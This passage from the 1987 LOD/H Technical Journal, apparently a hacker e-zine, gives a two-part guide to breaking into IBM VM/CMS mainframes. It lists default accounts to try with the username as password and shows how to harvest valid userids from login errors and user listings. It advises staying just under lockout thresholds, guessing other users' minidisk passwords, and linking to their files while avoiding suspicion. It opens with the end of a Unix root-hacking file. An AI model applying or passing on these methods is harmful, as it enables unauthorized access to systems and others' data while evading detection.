Unix, you can hack any system's root account at home, completely risk-free. Unix is the best operating system I've ever used. It's immensely powerful; as demonstrated by the program above, it's easy to make the system work for you. If you have any questions, comments, criticisms, threats, etc, get in touch with me - my primary goal is not to prove that I'm more of a Unix Wizard than the other guy, but rather to do my part in the ongoing crusade to make forbidden information available to the people who can use it. 'Knowledge is Power,' as the saying goes. -- Shark. Gfiles: (1-8, ^6),?,Q : The LOD/H Technical Journal: File #8 of 10 Lex Luthor and The Legion Of Hackers Present: Hacking IBM's VM/CMS Operating System Part A INTRODUCTION: ------------- IBM mainframes make up over 50% of the mainframes used in the United States. These systems are traditionally used in industries such as insurance, banking, universities and so on. For some reason, IBM systems as a whole have not been very popular with hackers. This may be due to the complexity of the Operating Systems run on IBM systems compared to others such as UNIX or VMS. Another reason may be that there is much variety from shop to shop. IBM systems are more commonly modified and customized to fit an individual corporations need and the lack of "universality" for commands, files, programs and other procedures makes it difficult to attempt to use without any type of specific documentation. The lack of detailed on-line help also hinders the hacker. I believe that the VM/CMS Operating System is by far the best and easily learned of the IBM systems. But compared to other Operating Systems like UNIX or VMS, VM/CMS is cumbersome and harder to learn. ACRONYMS: --------- Before I even attempt to start this article, I will list the IBM-specific acronyms used in this article and some others that you may find on various IBM systems. I list them here so I will not have to do it throughout this article. If you don't know what one of them means later, just refer back to this list. VM/SP: Virtual Machine/System Product CP: Control Program CMS: Conversational Monitoring System HPO: High Performance Option VSE: Virtual Storage Extended MVS: Multiple Virutal Storage TSO: Time Sharing Option JES: Job Entry System CICS: Customer Information Control System VSAM: Virtual Storage Access Method VTAM: Virtual Telecommunications Access Method IX: Interactive Executive IPL: Initial Program Load IVP: Istallation Verification Program RSCS: Remote Spooling Communications Subsystem DASD: Direct Access Storage Device EREP: Environmental Recording Editing and Printing SNA: Systems Network Architecture NCCF: Network Communications Control Facility REXX: Restructured Extended Executer Language VTOC: Volume Table Of Contents DOCS: Display Operator Console System JCL: Job Control Language ACF: Advanced Communications Functions SQL/DS: Structured Query Language/Data System DBA: Data Base Administrator GCS: Group Control System SCP: System Control Program FDP: Field Development Program CNA: Communications Network Application POF: Programmable Operator Facility PSW: Program Status Word SSCP: Subsystem Services Control Point IPCS: Interactive Problem Control System DCSS: Discontiguous Shared Segments VMCF: Virtual Machine Communications Facility FIFO: First In First Out LIFO: Last In First Out AP: Attached Processor MP: Multi-Processor R/O: Read/Only R/W: Read/Write LOGGING IN: ----------- Typically, when you come across a CMS system, it will respond with: VM/370 ONLINE ! . This message is somewhat of a contradiction. The majority of VM/CMS systems are rarely run on actual 370 systems but on other processors, such as the 43XX series and the 30XX series. The period "." prompt is the surest way of verifying that you have indeed connected to a VM/CMS system, aside from the "VM/370 ONLINE" message which is usually printed. This prompt should not be confused with DEC's TOPS-10 system, which also has the prompt of a period. The older versions of VM/CMS responded as shown above. The newer versions will give you this menu: Enter one of the following commands: LOGON userid (Example: LOGON VMUSER1) DIAL userid (Example: DIAL VMUSER2) MSG userid message (Example: MSG VMUSER3 GOOD MORNING) LOGOFF This menu may vary from system to system, since they may opt to not allow a command to be used before logging in and will omit it from the menu or they may add some commands. When hacking a system this menu will appear before you can attempt to login, thus becoming very tedious and time consuming especially at 300 baud as you have to wait an eternity for each logon attempt. Other responses after connecting are "Ready to Host", "Press break key to begin session" and "Invalid Switch Characters". The last response is commonly found on Telenet and other packet switched networks, in which you may have to specify "VM" for a VM/CMS system, or "TSO" for a MVS/TSO system. There may be other IBM systems to select from, or "VM" may not be a valid system. You may also have to specify "LOGON VM" or just "LOGON" before the port selector connects you to the host system. LOGON can be abbreviated as just "L". A userid can be from 1-8 characters in length, but the first character MUST be a letter (In most systems you come across this will be true, but due to customization of systems, its possible this and even the 8 character password limit may be extended). A typical logon may look like: .L COMOSOLO SYSGUESS NOIPL "." is the system prompt, L is the LOGON command, COMOSOLO is the userid, SYSGUESS is the password, and NOIPL is the only 'login qualifier' allowed for the VM/CMS system. NOIPL specifies that the IPL name or device in the VM/SP directory should not be used for an automatic IPL. IPL simulates the LOAD button and the device address switches on the real computer console. Basically it "boots" your part of the CMS system. This is another different concept. A user can boot (or crash) their part of the system not the whole system (in most cases). NOIPL would be used when a system dumps you into a program which allows you little or no mobility such as a restricted menu of options (IE: A system backup utility) and logs you off without gaining access to CMS. NOIPL will prevent this program from running if it is listed in your automatic IPL entry within the CP directory. This should allow you access to the system. Otherwise the program was specified to run within your PROFILE EXEC which lists things to be done upon logon. NOIPL is somewhat similar but not identical to the login qualifier "/NOCOMMAND" for DEC's VAX/VMS systems. If the Password Suppression Facility is installed on the system, you will receive an invalid format message whenever the userid and password are entered on the same line. This is obviously a security measure to prevent users from entering their password in full view of anyone who may be watching as the password is not "masked". Thus, you will have to enter your password on a separate line when the system prompts you for it. The advantage of entering the userid and password on one line (especially at 300 baud) is that you can try more userids and passwords in a shorter period of time while still availing yourself to the systems generousness of informing you when an invalid userid has been entered. Error messages: There are various error messages one may encounter while logging into a VM/CMS system. The ones you should be most concerned about are: "Userid not in CP directory": When an invalid userid has been entered, you will receive this message. This indication gives the hacker a distinct advantage for gaining entry to the system. Probably the largest security hole for any system is to tell you when a valid username has been entered. After all, obtaining a valid userid is half the battle. The other half is obtaining a valid password. Even the weakest Operating Systems no longer give an indication of when a valid ID has been entered. Why IBM has not changed this is a mystery to me. When a valid userid is entered you will be asked to enter a password if you did not already do so. If the password is correct, the system will attempt to log you on, if not, you will receive one of two messages: "Logon unsuccessful--incorrect password": As has just been stated, a valid userid has been entered but the password was incorrect. Passwords can be from 1-8 characters long, but in many cases the minimum length is changed to be at least three characters. There is no difference between upper and lower case letters for either the userid or password as they are converted to upper case by the system which is another security flaw as it reduces password possiblities. "Password incorrect - reinitiate logon procedure": This is the message received on the older versions of VM/CMS, which means the same thing as the above msg. "Maximum password attempts exceeded, try again later": The threshold has been reached for userid and/or password attempts. You will receive this message every time you attempt to logon after exceeding the threshold until a variable period of time (Probably from 1 to 5 minutes) has elapsed. This locks out ALL users who attempt to login to the system from that particuler line. I am not sure whether this is recorded anywhere or whether it is sent to the System Console so try to determine how many attempts normally trigger this and keep just short of it. "Already logged on": This message will appear when you attempt to logon with a valid userid and password and that userid is already online. Unlike other systems, VM/CMS will not allow the same userid to be logged on more than once. "Userid missing or invalid": As it implies, nothing was typed after entering the LOGON command, or the format for the userid was not correct, ie: using a number as the first character or a control character was used somewhere in the userid field. "Error in CP directory": The CP directory is the main user directory for the system. Entries in the directory contain: the userid and password, VM I/O configuration, disk usage values, associated virtual and real addresses, privilege classes, virtual processor size, and other options for each user. Without the proper directory entry, a user cannot logon to the system. Therefore receiving this error message. "Command not valid before logon": This occurs when you enter anything other than the commands listed in the menu, ie: entering BONEHEAD will return this message even though "BONEHEAD" isn't a valid command. Why this is I don't know. So don't get all excited that you found a valid command but couldn't execute it since you weren't logged on. Accounts: By constantly compiling userids from various systems you should be able to collect a nice list of accounts which may enable you to gain access to a system. The following are a few which I have found: OPERATOR CMSBATCH AUTOLOG1 OPERATNS VMTEST VMUTIL MAINT SMART VTAM EREP RSCS CMS SNA As usual, use the username as the password. Things still haven't changed from the Hacking VAX/VMS series...people are just as stupid as they were a few years ago. There are many default accounts which have the passwords listed in some IBM system manuals. These are hard to obtain and are very powerful since some passwords are rarely changed. If you can get access to the defaults, it will greatly expand your collection of systems, I guarantee it. Dial: DIAL is used to logically connect lines, whether they be switched (regular dial-up phone lines), leased (dedicated), or logically attached (directly connected), to a previously logged on multiple-access system. The DIAL command is the only substitute for the logon command. On systems running more than one Operating System, DIAL is used to connect the user to one of those systems. It is rather common to find two or more Operating Systems running parallel or "under" one another. This is quite different from most other systems, which run alone on the machine. One machine, one Operating System, but not IBM. The ability to have multiple systems running simultaneously and still providing the user with the illusion of it being a single system, (ie: the whole idea behind multi-tasking machines is to provide each user with the full resources of the machine so quickly that it appears that he or she is the only one using the system) sets IBM apart from most other computer manufacturers. Some of the systems which run on IBM's are: VM/CMS, MVS/TSO, DOS/VSE, OS/VS1. Some others are: MUSIC, JES and IX/370 which is IBM's version of UNIX which runs under VM/SP. It is always good to know what other systems are running, and if you are unable to gain access to the 'primary' system, you may be able to gain access to one of the 'secondary' system(s) by use of DIAL. Some systems will require you to specify a line number for certain systems. Others will find a line for you if one is not specified, assuming there are some allocated to that resource. Userid's are also dialable. In some cases you have to dial through a particular userid in order to gain access to certain systems or perform certain commands. A typical logon to a DIALed system may look like: .DIAL MUSICB DIALED TO MUSICB 040 *Miscellaneous Computer Services MUSIC/SP 1.1 SIGN ON. .RESET DROP FROM MUSICB 040 VM/370 ! . When it comes to finding a valid line number for systems that can be reached via DIAL, you could be in for some trouble. If the system requires a line number to be entered (unlike the above example, where line 040 was found automatically) you will not only have to come up with a defined line number, but one that is associated with the system you are attempting to access. Usually you can find this information after logging on to the VM/CMS system in various files, but if you cannot get in, you will have to sequentially enter line numbers. Some that I have seen are 001, 01B, 41A, 040. The VM/CMS system does not appear to limit the number of DIAL attempts a user can make, unlike LOGON attempts. Programming your micro to search for a valid line number to a system should work with no problem. To drop the dialed connection just type RESET. Error Messages: "Line(s) not available on 'sysname'.": Either there are no lines allocated to the system, or you must enter a correct line number. "Invalid device type - 'sysname' 'line#': You have entered a valid system or userid and line number, but the device you are on (the terminal) is invalid. In this case, a GRAF (Graphics) device, system console or 3270 terminal may be the only valid device. "'userid' not logged on": The DIAL command cannot be executed unless the user (or system) specified is logged on. "'line#' does not exist": A valid userid/system has been entered but the line number for that userid/system is not valid. Message: MSG is used to send messages to users who are currently logged on. This command can be issued before (if specified by the logon menu) and after logging in. MSG OPERATOR Help! I lost my password! My userid is COMOSOLO This will send a message to the primary system operator of the system. If there is only one CLASS A user online, the message will be sent to his terminal. MSG * This will send a message to yourself. This is useful for identifying the current userid of an abandoned terminal. Logoff: The LOGOFF command can be abbreviated as LOG. After logging off you will receive the following: CONNECT= 00:33:54 VIRTCPU= 000:00.28 TOTCPU= 000:01.76 LOGOFF AT 17:05:44 EST THURSDAY 04/16/87 CONNECT is the actual clock time you spent while on the system. VIRTCPU is the virtual CPU time that was used. TOTCPU is the total CPU time both virtual and overhead that was used. The HOLD command will hold the connection allowing you to re-logon again without having to re-dial the system. .LOG HOLD SECURITY SOFTWARE: ------------------ There are various weaknesses within VM/CMS both internally and externally which can be exploited. For this reason, various software security packages have been written. There would not be a need for these in most cases if the people in charge of system security knew what they were doing. Anyhow, these packages do provide added security when properly implemented. The most commonly found are VMSECURE and ACF2. TOP SECRET and RACF are others which are less common. These packages are easily identified. After entering a valid userid VMSECURE responds with: VMXACI104R Enter logon password: ************************** HHHHHHHHHHHHHHHHHHHHHHHHHH SSSSSSSSSSSSSSSSSSSSSSSSSS . One way to positively identify the use of VMSECURE is by using it as a userid. If it is running it will be a valid userid, and who knows, you may even hack the password. After entering a bad password ACF2 (Access Control Faclity 2) responds with: ACFV1012 PASSWORD NOT MATCHED ACFV0044 ACF2, ENTER PASSWORD ************************** HHHHHHHHHHHHHHHHHHHHHHHHHH SSSSSSSSSSSSSSSSSSSSSSSSSS . These packages provide information which SHOULD be inherent within the Operating System itself. Perhaps newer versions of CMS will contain them. Some of these features are: * Last logon date/time * Password expiration * Rules for password selection * Invalidating userids for invalid password attempts * Invalidating terminals for invalid password attempts * Shows users how many invalid password attempts have occured on their userid * Increased file security LOGGED ON: ---------- After logging on you may receive something similar to the following: DASD 190 LINKED R/O; R/W BY MAINT; R/O BY 030 USERS LOGMSG - 10:40:25 EST FRIDAY 05/22/87 ********************************************************************* * WELCOME TO MISCELLANEOUS COMPUTER SERVICES * * -VM1- * * SYSTEM WILL BE DOWN FROM 10:00 TO 10:30 EST SUNDAY MAY 24, 1987 * ********************************************************************* Logon at 13:22:59 EST FRIDAY 05/22/87 VM/SP REL 4 04/20/86 11:33 R; T=0.01/0.01 13:23:10 . Line #1: This line shows that the disk at virtual address 190 is linked with R/O access by you, R/W by userid MAINT and R/O by another 30 users. Line #2: This shows that the logon message was created at 10:40 on Friday. Line #3-7:This is the message that is shown to all users of the system upon logging on. Some systems may not have one. Line #8: The actual time of logon is printed. Line #9: The current RELEASE of VM/SP and the time and date it was installed is shown. Line #10: This is the ready message and it is printed after every command is performed where: R= Ready This indicates that the system is ready for input. T= Time The first series of numbers tells how long it took the system to perform the last task. The second set of numbers gives the time of day. If you do not receive the ready message you are in CP and must IPL CMS in order to issue CMS commands. Line #11: The system prompt, you can now enter commands. PRIVILEGE CLASSES: ------------------ As with most other Operating Systems a user must have sufficient privileges in order to execute certain commands. Every CP command belongs to one of eight IBM defined privilege classes. The CP directory defines which users can use which classes of commands. Each user has one or more privilege classes, as does each CP command. If you try to issue a command that does not match the assigned privilege class of the userid you are using, the system will not process the command. As far as I know, no records of attempts to use privileged commands are kept. Class User and Function --------------------------------- A Primary System Operator: The class A user has the ability to control the system. Any user who uses the VM/SP system console posseses this privilege class. This user can broadcast messages, control system accounting, and issue commands which affect the overall performance of the system. B System Resource Operator: The class B user has the ability to control all the "real" resources of the system, except those controlled by the spooling and primary system operators. C System Programmer: Class C users can modify real storage as opposed to virtual storage. D Spooling Operator: The class D user controls spooling data files. E System Analyst: Monitors and interprets system performance data. F Service Representative: This class is usually given to accounts that IBM Field Service personnel use for updates and also for diagnosing system problems. G General User: Class G users are the most prominent on the system. This privilege allows the user to control functions associated with their own virtual machine. Any The Any classification is given to certain CP commands which are available to any user. The commands are usually limited to Login and Logoff. H Class H is reserved for IBM use. Due to the individual needs of a site, privilege classes can be tailored to suit the facility. A total of up to 32 classes can be made. They would be shown in the CP directory as A-Z and 1-6. Typical Privilege Classes for a few common userids: Userid: P.C. ------------------------- OPERATOR A EREP F OPERATNS BCEG MAINT ABCDEFG COMMANDS: --------- Commands are made up of command names, operands, and options. Command Name: A command name is an alphanumeric symbol of up to 8 characters. Operands: These specify the information on which the system operates when it performs a command function. Options: These keywords are used to control the execution of a command. When used, they must be preceded by a left parentheses, but a closing one is not necessary. Different commands are used within different environments. To see which environment you are in, simply hit return at the period prompt. You will receive one of the following: CMS, CP, XEDIT. There are many commands that are useful to both regular system users and hackers. HELP is available on some systems, particularly on university systems. It is extensive but not as clear as yes, UNIX or VMS which is typical of IBM. Nevertheless, HELP is useful and you should get hardcopies of as many commands as you can. AID is another form of HELP which may be useful to you in learning more about the system. One nice feature of CMS HELP is that when you receive an error message, you can: .HELP DMS000000 or DMK000000 Where DMS000000 or DMK000000 is the error message you have received. The system will then explain what it is, why it happened and how you can correct it. I am going to hold off on explaining any and all commands related to minidisks until the next section. The others which I have found to be useful are as follows. You can issue any CP command while in CMS by precluding the command with CP. QUERY Query allows you to obtain various information about the system. A full list can be found from using HELP. One of the most important QUERY commands to the hacker is: .Q NAMES OPERATOR - 01F, SMART - DSC, CMS0349 - B27, LOGO0180 - B31 VSM - VMVS1 SCOTT -TP11WFM2, CMS1211 -TP11WF64, OPERATNS-TP11WFY1 R; T-0.01/0.01 11:34:28 There can be many users online, usually this list will contain from 30 to 100 users. The last user online was OPERATNS, since it was last in the list. The SMART userid is DSC, or in a disconnected state. Usually a terminal will remain disconnected for 15 to 30 minutes and then is totally logged off the system. If you logon to an already disconnected terminal, the system will reply with "RECONNECTED AT time". The other 2 userids on the same line as SMART are probably connected terminals which are in a pre-logged in or pending logon state. VSM - VMVS1 is another system running parallel to (or under) CMS. The QUERY NAMES command allows you to gain a little more security for yourself on the system. It allows you to gain more valid usernames to attempt passwords for in the unfortunate event that your current userid dies. Another use is that you can start to compile your "common accounts" list of userids which are found on VM/CMS systems. This list should get larger and larger as you gain access to more and more systems and will allow you to gain access to more systems as it gets larger. If you can't count how many users are online from the Q NAMES list: .Q USERS 0007 USERS, 0000 DIALED, 0000 NET If you didn't catch the logon message you can view it again by: .Q LOGMSG To see what release of CMS the system is: .Q CMSLEVEL VM/SP REL. 4, SERVICE LEVEL 417 If you are wondering which IBM mainframe CMS is running on, you can issue: .Q CPUID FF01472343810000 This can be interpreted as follows: CPUID= aabbbbbbccccdddd aa= "FF" when running VM/SP bbbbbb= The processor ID number cccc= The model number of the system. In the above case, CMS is running on an IBM 4381 system. dddd= "0000" This is not used for CP. SENDFILE allows you to send files within any minidisk that is currently accessed by you to another user. Anytime you send a file an entry is made in the file USERID NETLOG (where USERID is the user you are sending the file to). This command is also used for sending NOTE files which can be created with an editor and send to whomever as E-MAIL. If you are tired of seeing a text listing, or have attempted to read a compiled program and wish to exit or break out of it, simply hit a hard-break, and then type HX. HX is for Halt eXecution. It will halt whatever you are doing and put you back into the CMS environment. It may take a few lines of text after entering it for the system to stop the process. --- End of Part A --- --- Attach Part B here --- (>View: hacking vm/cms part b.tj2 The LOD/H Technical Journal: File #9 of 10 Hacking IBM's VM/CMS Operating System PART B Command Interpretation Chart: The following chart will compare the commands used on VAX/VMS, UNIX, and VM/CMS to allow those who are familiar with the other Operating Systems to quickly reference its CMS counterpart. +-----------------+---------------+----------------------+--------------------+ ! VAX/VMS ! UNIX ! VM/CMS ! SHORT EXPLANATION ! +-----------------+---------------+----------------------+--------------------+ ! /NOCOMMAND ! *****NONE**** ! NOIPL ! aborts login pgm ! +-----------------+---------------+----------------------+--------------------+ ! SHOW USERS ! WHO ! QUERY NAMES ! online userlisting ! +-----------------+---------------+----------------------+--------------------+ ! DIRECTORY ! LS ! LISTFILE or FILELIST ! show current dir. ! +-----------------+---------------+----------------------+--------------------+ ! TYPE filename ! CAT filename ! TYPE fname ftype fm ! list or view files ! +-----------------+---------------+----------------------+--------------------+ ! EDIT ! ED or VI or EX! XEDIT ! system editor ! +-----------------+---------------+----------------------+--------------------+ ! DELETE filename ! REMOVE filenme! ERASE fname ftype fm ! deletes files ! +-----------------+---------------+----------------------+--------------------+ ! PHONE username ! WRITE user ! TELL userid ! user communication ! +-----------------+---------------+----------------------+--------------------+ ! Control-Y ! Ctrl-Backslash! Hard-break then HX ! aborts process ! +-----------------+---------------+----------------------+--------------------+ Corresponding files: +-----------------+---------------+--------------+----------------------------+ ! SYSUAF.DAT ! /ETC/PASSWD ! USER DIRECT ! Userlist & user information! ! MAIL.TXT ! USR/MAIL/user ! USERID NOTE ! Electronic mail files ! ! LOGIN.COM ! .PROFILE ! PROFILE EXEC ! User login command files ! +---------------------------------+--------------+----------------------------+ Local Commands: --------------- Local commands are commands written for an individual system. They are customized commands that suit a facilities' needs. These commands are execs which are either not available from IBM or are cheaper to write on their own. I will mention a few which may be found on other systems, as these are rather common. WHOIS This command gives a little information about the users that you specify which are on the system. .WHOIS MAINT BACKUP MAILER BUBBA RELAY VMUTIL Userid Name --------- --------- MAINT System Maintenance Account BACKUP VM System Backup and Recovery Machine MAILER BITNET Inter-Node Mail Processing Machine BUBBA Bubba B. Bonehead - Programmer/Analyst Extroadinaire RELAY BITNET Internet Chat Facility VMUTIL VM Utilization Statistics SYSPASS READPW WRITEPW In most cases, the only way to change a users' password is by having the system operator or someone with high privileges do it. This is one reason why many passwords remain the same for long periods of time. These programs allow users to change their logon password, read access minidisk password and write access minidisk password respectively. Perhaps you will find these or similar programs on some systems. Privileged Commands: -------------------- As far as I know, there is no command to determine which privilege class the userid you are abusing is. The only way is to check in the CP Directory for it. The following are some privileged commands and what privilege class is needed to run them. Again, as far as I know, the system keeps no records of failed attempts at running privileged commands. Use of these commands are most likely recorded, has a msg sent to the system console or both, especially when using FORCE. FORCE userid (Class A) This command will forcibly log off the userid you specify. I really can see no reason other than to be a total asshole for abusing this command. DISABLE raddr (or) all (Class A or B) This is used to prevent specific terminals or all terminals from logging onto the system. Again, there is no real reason to use this or most other privileged commands for that matter unless you want to be kicked off of the machine. If you do DISABLE a terminal, simply use ENABLE to repair the damage. DETACH realaddr (FROM) whatever (Class B) This is used to detach real devices from the system. These can be terminals, printers, disk packs, tape drives, etc. You must know the real address of the device, and 'whatever' can be the system, or a userid. WARNING userid (or) operator or all (Class A or B) Warning will send a priority message to a user, operator or all users on the system. It will interrupt anything they happen to be doing. Obviously sending a msg to all users stating they are BONEHEADS is not recommended. MINIDISKS: ---------- A minidisk is a subdivision of consecutive cylinders on a real DASD volume. The real DASD device, is the actual disk the information is stored on. This can be compared to a hard drive for an IBM PC. Before the drive can be used, it must be formatted. Once formatted, it is divided up into directories which are minidisks. Each minidisk is a number of cylinders which is the standard memory storage unit. There can be many minidisks on a DASD. Associated with each CMS disk, is a file directory, which contains an entry for every CMS file on the disk. A minidisk can be defined for R/W or R/O access. It can also be used for temporary or permanant storage of files. Each minidisk has a virtual address. Virtual addresses can be from 001-5FF (hexidecimal) in basic control mode, and 001-FFF in ECMODE (Extended Control Mode). CMS minidisks can be accessed according to a letter of the alphabet (A-Z). In order to better explain this, lets assume we are logged onto a VM/CMS system under the userid of JOE and we want to see what minidisks we have access to. We use the QUERY SEARCH command to determine which disks we are ATTACHed to. .Q SEARCH JOE001 191 A R/W JOE002 192 D R/O CMS190 190 S R/O CMS19E 19E Y/S R/O As can be seen each minidisk has a volume name, virtual address, filemode, and access mode. The A disk is the default. Most accounts you gain access with will have an A disk with a virtual address of 191. The S disk is the System disk. This contains the files and programs for running the system. The same goes for the Y disk. The D disk is another disk used by JOE. You can view what each of these directories contains by issueing the LISTFILE command. .LISTF BUBBA NOTE A1 MISC WHATEVER A1 PROFILE EXEC A0 This is a list of files on the A disk. The first column is the Filename the second is the Filetype and the third is the filemode. Filenames can be anything you specify. Filetypes can also be anything you specify, but commonly follow a pattern which tells what type of file it is. Filemodes are comprised of a filemode letter (A-Z) and a filemode number (0-6). Filenames can contain the following characters: A-Z 0-9 $ # + - : ` U Here is an explanation of common filetypes: Filetype ! Description ---------+------------- DATA ! Data for programs or simply TYPE-able text. EXEC ! User written programs or IBM procedures written in REXX. HELP ! System HELP files. HELPCMS ! System HELP files. LANGUAGE ! One of the langauges that the system supports, such as ASSEMBLE, ! COBOL, FORTRAN, JCL, REXX, PL1, SNOBALL, BINARY, ETC. LISTING ! Program source code listings LOADLIB ! Loading Library MACLIB ! Macro Library MODULE ! System commands NETLOG ! Contains a list of all files which have been SENT to other users. NOTE ! Similar to E-MAIL on other systems, a note sent from another user. SOURCE ! SOURCE code for various programs. TEXT ! Text file. Probably used for programs and when TYPEd yields little. TXTLIB ! Text Library WHATEVER ! A nonstandard filetype which will probably be somewhat descriptive ! of its contents. XEDIT ! A file which was created using the XEDIT utility. Both filenames and filetypes must not exceed 8 characters in length. Filemodes: Filemode numbers are classified as follows: Filemode 0 There is little file security on VM/CMS. This may be due to the fact that directory security is very good. A file with a mode of zero makes that file invisible to other users unless they have Read/Write access to that disk. When you LINK to someones' disk in Read/Only mode and get a directory listing, files with a mode of 0 will not be listed. Filemode 1 This is the default filemode. When reading or writing files, you do not have to specify a filemode letter of 1 (unless you want to) since it will default to it. Filemode 2 This is basically the same as a filemode of 1. It is mainly assigned to files which are shared by users who link to a common disk, like the system disk. Filemode 3 Be careful when you see these! These are erased after they have been read. If a file with a mode of 3 is printed or read it will be erased. Blindly reading files without paying attention to the filemode numbers can shorten your stay on the system. The main reason for this filemode is for the files or programs which are unimportant or have one time use can be automatically deleted to keep disk space and maintenance to a minimum. Filemode 4 This is used for files that are to simulate OS data sets. They are created by OS macros in programs running in CMS. I have not found any files with this filemode, so for the time being, you should not be concerned about it. Filemode 5 This is basically the same as filemode 1. It is different in that its used for groups of files or programs. It makes it easier for deleting files a user wants to keep for a certain period of time. You could just enter: ERASE * * A5 Now all files on the A disk with a filemode of 5 will be deleted. Filemode 6 Files with this mode are re-written back to disk in the same place which is called "update-in-place". I have no idea why this would be specified, and have not found any files with a filemode of 6. Filemode 7-9 These are reserved for IBM use. Look back to our Q Search listing. If you want to see what is on the D disk: .LISTF * * D NOTMUCH ONHERE D1 In this case, the D disk only contains 1 file called NOTMUCH with a filetype of ONHERE. But do not forget the fact that you only have Read/Only access to the D minidisk! So there may or maynot be merely 1 file on the D disk. Remember all filemodes of 0 (which in this case would be D0) are invisible to anyone who does not posses Read/Write access. You can access any disk that you are ATTACHed to by replacing the D in the above example with the filemode letter (A-Z) you want to access. As was shown previously, the QUERY SEARCH command will give you a list of minidisks that your userid is attached to upon logging in. These command statements are usually found in your PROFILE EXEC. So you can access a few minidisks. There may be hundreds on the system. Unlike UNIX and VMS, and most other Operating Systems for that matter you cannot issue a command and some wildcard characters to view the contents of every users' directory. In order to access another users' directory (minidisk) you must have the following: 1) The USERID of the person whose disk you wish to access. 2) The virtual address(es) (CUU) that the USERID owns. 3) The Read, Write, or Multi disk access password, depending on which access mode you wish to use. This would be accomplished by the following: .LINK TO BUBBA 191 AS 555 RR Enter READ link password: ************************* HHHHHHHHHHHHHHHHHHHHHHHHH SSSSSSSSSSSSSSSSSSSSSSSSS .RBUBBA R; T=0.01/0.01 21:58:48 .ACCESS 555 B R; T=0.01/0.01 21:59:03 .Q SEARCH JOE001 191 A R/W BUB001 555 B R/O JOE002 192 D R/O CMS190 190 S R/O CMS19E 19E Y/S R/O .LISTF * * B MISCFILE DATA B1 PROFILE EXEC B1 .REL 555 R; T=0.01/0.01 22:02:01 Now an explanation for the events which have just occured. The LINK command is used to access other users' minidisks. The format is: .LINK (TO) USERID VADDR1 (AS) VADDR2 (MODE) ((PASS=)PASSWORD) BUBBA is the USERID whose disk we wish to access. VADDR1 is a virtual address which belongs to the BUBBA userid. If BUBBA was to access our minidisk whose userid is JOE, he could access either our 191 address or our 192 address. The 190 and 19E addresses are usually automatically accessed by nearly all the users of the system since it contains system commands. We are assuming that BUBBA indeed has a minidisk with the virtual address of 191. Some userid's may not have any or they may have addresses which are somewhat obscure, say of 13A or 503. The only way we would be able to access those assuming BUBBA did not give them to us would be to guess them. This would be rather difficult, timeconsuming, and dangerous as we will soon see. VADDR2 is any address which is not currently in our control, (ie. in our Q Search which would be 190, 191, 192, 19E) and is in the range of 001 to 5FF in Basic Control or FFF in Extended Control. In this example, we chose to use 555. We could have easily used 104, 33F, 5FA, etc. MODE is the access mode which consists of up to 2 letters. The first letter specifies the Primary access mode. The second letter is optional and designates the alternate access mode. If the primary mode is not available, the alternate is used. The access mode we used was RR. Valid access modes are: R Primary Read/Only access. This is the default. You can opt to not specify an access mode when linking to a users' disk, and this is the mode which is used. It will only work if no other links are in effect. RR This allows read access no matter what links are in effect to that users' disk. W Primary Write access. This is only good if no other links are in effect. WR If Write is available then the link will be made, if not it will goto Read. M Primary Multiple access. MR Resorts to Read if Multi is unavailabe. MW This garauntees write access no matter what. If another user has write access to one of your disks when you log on, your access will be forced to Read/Only. For this reason, you should have read access to others disks instead of write. If you wish to see what files have a filemode of zero, then link with write access, view or access those files, then RELEASE the disk and re-access it via read to avoid suspicion by that user of unauthorized individuals gaining write access to his files. If a user has write access to a disk, you cannot gain write access unless you use a mode of MW. It is not recommended to have write access to anothers' disk if they themselves have write access. CMS cannot guarantee the integrity of the data on a disk which has more than one person linked to it with write access. Now if you see that the user is in a disconneced (DSC) state through the Q NAMES command, then it shouldn't be a problem if you have write access also since the person is not active. If that person re-connects however, then it is advisable to RELEASE that disk as soon as possible to avoid any chance of data being destoyed. PASS=PASSWORD like the logon password, it can be a 1-8 character string that MUST match the access mode password for the VADDR1 of the userid which you are attempting to gain access to. Up to three access mode passwords can exist for each minidisk, R, W, and M. If the installation uses the Password Suppression Facility, an INVALID FORMAT message will be issued when you attempt to enter the password for a disk on the same line as the LINK command was entered on. Obviously this is to prevent people from 'spoofing' the password off the screen or from printouts found in the trash. If this occurs, just hit return after entering the access mode, and wait for the enter password response. Every disk password along with every users password and other information is contained in the CP Directory. If the password is "ALL" then a password is not required for any user so you will not be asked for one. You will then recieve a ready message indicating that the transaction has just been completed. If you receive the message: "BUBBA 191 NOT LINKED; NO READ PASSWORD" then within the CP Directory, there is no read password at all. This means that the only way you can gain access to BUBBA's directory would be by getting his logon password. One note, I believe that a users logon password cannot be any of his access mode passwords. The reasons for this are obvious. If BUBBA wants JOE to access a disk, then he can give JOE the corresponding disk password. If this was identical to his logon password then JOE could logon as BUBBA and access all BUBBA's disks with no problem, and at the same time posses all the privs that BUBBA has. Within the CP directory, if there is no password entry for read access then there are no entries for write nor multi. If there is no entry for write then there may or may not be an entry for read, but definitly not one for multi. And finally if there is no entry for multi then there may or may not be entries for read and write. The methods for obtaining disk access passwords are the same as anything else. Common sense and "Password Psychology" come into account along with the element of luck. Assume the userid is VMTEST and you are hacking the READ password. Passwords may be: RVMTEST, RVM, RTEST, RTESTVM. Others may be READ, READVM, VMREAD, READTEST, TESTREAD and even VMTEST. Of course it could be something like: J2*Z5 Many times the same password will be used for R, W, and M access instead of three separate passwords. CP keeps track of unsuccessful LINK attempts due to invalid passwords. When you exceed the maximum number of incorrect password attempts, which usually defaults to 10, the link command will be disabled for the remainder of your stay on the system. All you have to do is re-logon and you will have full use of LINK again. If the LOGON/AUTOLOG/LINK journaling facility is activated, unsuccessful link attempts due to the above are recorded. When the threshold is reached the userid whose password you are trying to hack is sent a message. Therefore, keep track of the number of attempts you make and keep just short of the system threshold. After successfully linking to a users' disk, you must issue the ACCESS command in order to get a directory listing or access any files on that disk. This is accomplished by: .ACCESS VADDR2 B VADDR2 is the address after 'AS' in your link command line, and 'B' is the filemode letter which you wish to access the disk as. This can be anything but the letters which you have already assigned up to a total of 26 (A-Z). After accessing the disk to your hearts content, you can then RELEASE it. When you logoff the disk is automatically released. Releasing the disk is not necessary unless you already are attached to 26 minidisks, and you want to access more. You would then release whatever disks you wish and link then access others. After releasing disks, and you want to re-access that disk, you do not have to issue another link command but merely the ACCess command and what filemode you wish it to be. The QUERY DASD command will list the minidisks that most everyone on the system has access to. All of these may or maynot be automatically accessed upon logon. For this reason, you should issue it, then all you have to do is ACCess the virtual address and define the filemode. .Q DASD DASD 190 3380 SYSRES R/O 32 CYL DASD 191 3380 SYSRES R/W 1 CYL DASD 192 